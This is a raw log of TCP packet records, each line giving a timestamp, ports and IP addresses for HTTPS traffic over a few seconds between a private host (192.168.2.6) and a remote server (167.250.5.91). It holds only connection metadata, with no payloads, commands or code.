                                                        Nov 21, 2024 12:54:55.743892908 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:57.330137968 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:57.330270052 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:57.337546110 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:57.337584019 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:57.337950945 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:57.389168024 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:57.403898954 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:57.451329947 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.086720943 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.086744070 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.086754084 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.086791992 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.086803913 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.086812019 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.086878061 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.086921930 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.086951971 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.086996078 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.194276094 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.194295883 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.194447041 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.194464922 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.194518089 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.297449112 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.297468901 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.297544956 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.297564030 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.297616005 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.381082058 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.381105900 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.381249905 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.381313086 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.381373882 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.408202887 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.408220053 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.408335924 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.408353090 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.408421993 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.432789087 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.432806969 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.432882071 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.432895899 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.432933092 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.432977915 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.508424044 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.508444071 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.508536100 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.508559942 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.508614063 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.589839935 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.589860916 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.590059042 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.590076923 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.590137005 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.606448889 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.606467009 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.606595039 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.606610060 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.606666088 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.618488073 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.618503094 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.618637085 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.618666887 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.618716002 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.631457090 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.631472111 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.631573915 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.631587029 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.631640911 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.646787882 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.646804094 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.646920919 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.646939993 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.646986008 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.720396996 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.720412970 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.720587015 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.720603943 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.720659971 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.794095993 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.794115067 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.794372082 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.794437885 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.794604063 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.803868055 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.803888083 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.803973913 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.803991079 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.804048061 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.812513113 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.812530994 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.812618017 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.812633038 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.812688112 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.822137117 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.822154045 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.822233915 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.822249889 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.822300911 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.831410885 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.831427097 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.831521988 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.831536055 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.831598997 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.841084003 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.841100931 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.841171980 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.841186047 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.841360092 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.861289024 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.861320019 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.861409903 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.861429930 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.861486912 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.998334885 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.998353004 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.998590946 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:58.998656034 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:58.998720884 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.005455971 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.005470037 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.005579948 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.005595922 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.005650043 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.011673927 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.011687040 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.011800051 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.011812925 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.011862993 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.018821955 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.018836975 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.018965960 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.018980026 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.019028902 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.025712013 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.025727034 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.025875092 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.025888920 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.025939941 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.032352924 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.032366991 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.032457113 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.032470942 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.032526970 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.039418936 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.039433002 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.039508104 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.039520979 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.039608955 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.070713043 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.070734024 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.070822001 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.070863008 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.070909977 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.208766937 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.208787918 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.208909035 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.208966017 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.209033012 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.215580940 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.215596914 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.215681076 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.215702057 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.215759993 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.221575022 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.221585989 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.221662998 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.221683025 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.221730947 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.228571892 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.228586912 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.228667021 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.228686094 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.228739023 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.235208035 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.235223055 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.235299110 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.235337019 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.235388994 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.241765022 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.241780996 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.241854906 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.241874933 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.241921902 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.248497009 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.248512030 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.248579979 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.248620987 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.248667002 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.280946970 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.280963898 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.281125069 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.281145096 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.281212091 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.419430971 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.419447899 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.419534922 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.419598103 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.419657946 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.425659895 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.425678015 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.425791979 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.425806999 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.425854921 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.432446957 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.432465076 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.432538033 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.432552099 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.432606936 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.440202951 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.440217972 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.440310001 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.440327883 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.440386057 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.446182013 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.446196079 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.446274996 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.446289062 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.446368933 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.453421116 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.453435898 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.453506947 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.453520060 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.453577995 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.459723949 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.459741116 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.459804058 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.459820032 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.459850073 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.459871054 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.491426945 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.491445065 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.491538048 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.491552114 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.491602898 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.629926920 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.629945040 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.630048990 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.630085945 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.630151987 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.636497974 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.636513948 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.636599064 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.636617899 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.636670113 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.642527103 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.642544985 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.642637968 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.642654896 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.642731905 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.649446011 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.649461031 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.649585962 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.649606943 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.649653912 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.656156063 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.656171083 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.656244993 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.656260014 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.656312943 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.662564039 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.662573099 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.662657022 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.662669897 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.662735939 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.669315100 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.669320107 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.669433117 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.669445992 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.669507027 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.701941013 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.701965094 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.702053070 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.702095985 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.702130079 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.702151060 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.840873957 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.840895891 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.840954065 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.840993881 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.841023922 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.841044903 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.847819090 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.847837925 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.847898960 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.847918987 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.847966909 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.853775024 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.853792906 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.853868008 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.853888035 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.853935957 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.860619068 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.860635996 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.860699892 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.860718966 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.860764027 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.867506981 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.867522955 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.867598057 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.867615938 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.867659092 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.873841047 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.873857975 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.873929977 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.873950958 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.873979092 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.873996019 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.880378008 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.880400896 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.880469084 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.880489111 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.880527020 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.912168026 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.912183046 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.912262917 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:54:59.912281990 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:54:59.912328005 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:55:00.051223040 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.051245928 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.051307917 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:55:00.051388979 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.051440001 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:55:00.051440954 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:55:00.058119059 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.058140993 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.058221102 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:55:00.058238983 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.058303118 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:55:00.064069986 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.064085007 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.064165115 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:55:00.064181089 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.064229965 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:55:00.071007013 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.071022987 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.071115971 CET49707443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:55:00.071135998 CET44349707167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:55:00.071191072 CET49707443192.168.2.6167.250.5.91
